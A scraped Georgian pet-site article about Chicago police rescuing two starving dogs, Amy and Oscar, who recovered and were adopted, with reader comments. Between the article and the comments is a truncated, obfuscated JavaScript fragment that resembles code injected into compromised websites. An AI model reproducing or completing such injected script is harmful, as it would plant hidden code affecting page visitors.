პოლიციელებმა მიტოვებულ სახლში მყოფი ორი მომაკვდავი ძაღლი გადაარჩინეს…
პოლიციელებმა მიტოვებულ სახლში მყოფი ორი მომაკვდავი ძაღლი გადაარჩინეს…
გადარჩენის ისტორია ნახევრად დანგრეული შენობიდან იწყება. ჩიკაგოს პოლიციის სამმართველოს ოფიცრებმა ერთი მიტოვებული სახლიდან საეჭვო ხმა გაიგეს. ისინი მზად იყვნენ ყველა ხიფათის შესახვედრად, მაგრამ ნამდვილად არ ელოდნენ იქ ცოცხალ არსებებს - თუკი შეიძლება, რა თქმა უნდა, შეიძლება ასე მოხსენიება ორი საწყალი ძაღლის, რომლებიც ნახევრად დანგრეულ სახლში, ნახევრად სიბნელეში საკვებისა და წყლის გარეშე, ვინ იცის, რამდენი ხანი იყვნენ გამომწყვდეულნი. ასევე, არავინ უწყოდა, რამდენი ხანი შიმშილობდნენ, რადგან ფაქტობრივად, უკვე ჩონჩხს დამსგავსებოდნენ.

Zooclub

Zooclub

ოფიცრებმა ძაღლები მაშინვე საქველმოქმედო ორგანიზაცია Trio Animal Foundation-ში გადაიყვანეს, სადაც ისინი ვეტერინარმა
გასინჯა. ცხოველები იმდენად გამოფიტულები იყვნენ, რომ დახმარების გარეშე ვერ დადიოდნენ. თითოეულის წონა 10 კილომდე იყო,
ემის ინფექცია აღენიშნებოდა, ოსკარს კი - თირკმლის უკმარისობა.

Zooclub

არ იღელვოთ, ჩვენს ისტორიას ბედნიერი დასასრული აქვს - რამოდენიმე თვის განმავლობაში რეაბილიტაციის შემდეგ ძაღლები ემი და ოსკარი სრულიად გამოჯანმრთელდნენ, დაიბრუნეს ნორმალური წონა, ასევე იპოვეს ახალი პატრონები, რომლებსაც ისინი უყვართ და ბედნიერები არიან.

Zooclub

ავადმყოფობის დროს, როდესაც ემი ვერ დადიოდა, მოხალისე ენტონი ხელით ატარებდა. გამოჯანმრთელების შემდეგ ემი თავშესაფარში უნდა გადაენაწილებინათ, რომ შემდეგ მსურველ ოჯახს აეყვანა, ენტონიმ ვერ შეძლო მისი დათმობა და ემი სახლში წაიყვანა. ახლა ბედნიერ ძაღლს ჰყავს ოჯახი და კიდევ ერთი მეგობარი.

Zooclub

Zooclub

ოსკარის გამოჯანმრთელებას სამი თვე დასჭირდა. გამოჯანმრთელების შემდეგ ეს საყვარელი არსება არავის მიყავდა. მაგრამ გამოჩნდა ოჯახი, რომელსაც უკვე ჰყავდა ლეკვი, მაგრამ ძაღლის შესახებ განცხადების წაკითხვისთანავე აიყვანეს ოსკარი.

Zooclub

Zooclub

Zooclub

ისინი ახლა უბედნიერესები არიან!


// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
tito
ყველა იმ ადამიანის გასაგონად ვინც იძახის - უფ დიდი ამბავი, ძაღლები გვაკლია კიდევო.. სათითაოდ თქვენი ასე და ისე რა.. იმ ძაღლის მდგომარეობაში უნდა ჩაგაგდოთ თქვენ და კიდე თუ ვინმე გყავთ სიახლოვეს თქვენნაირი ველური სულის... იზრუნეთ საკუთარი სულის კეთილშობილებისთვის და ჰუმანიზმისთვის! თორემ დარჩებით ის რაც ხართ, ველურები.
mimi
ზუსტად ასე მიტოვებული ძაღლი გადავარჩინეთ რუსთავში. ის ეხლა ჩვენთან ერთად ცხოვრობს და მართლაც რომ ბედნიერიაააააა
maka
გაიხარეთ
lali
ჩვენთან ალბათ არც ეცდებოდნენ მათ გამოჯანმრთელებას. თავს თუ შეიწუხებდნენ მათი ნანგრევებიდან დახსნაზე, ესეც საკითხავია. ამ დროს თავი დედამიწაზე საუკეთესო ერად მიგვაჩნია
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?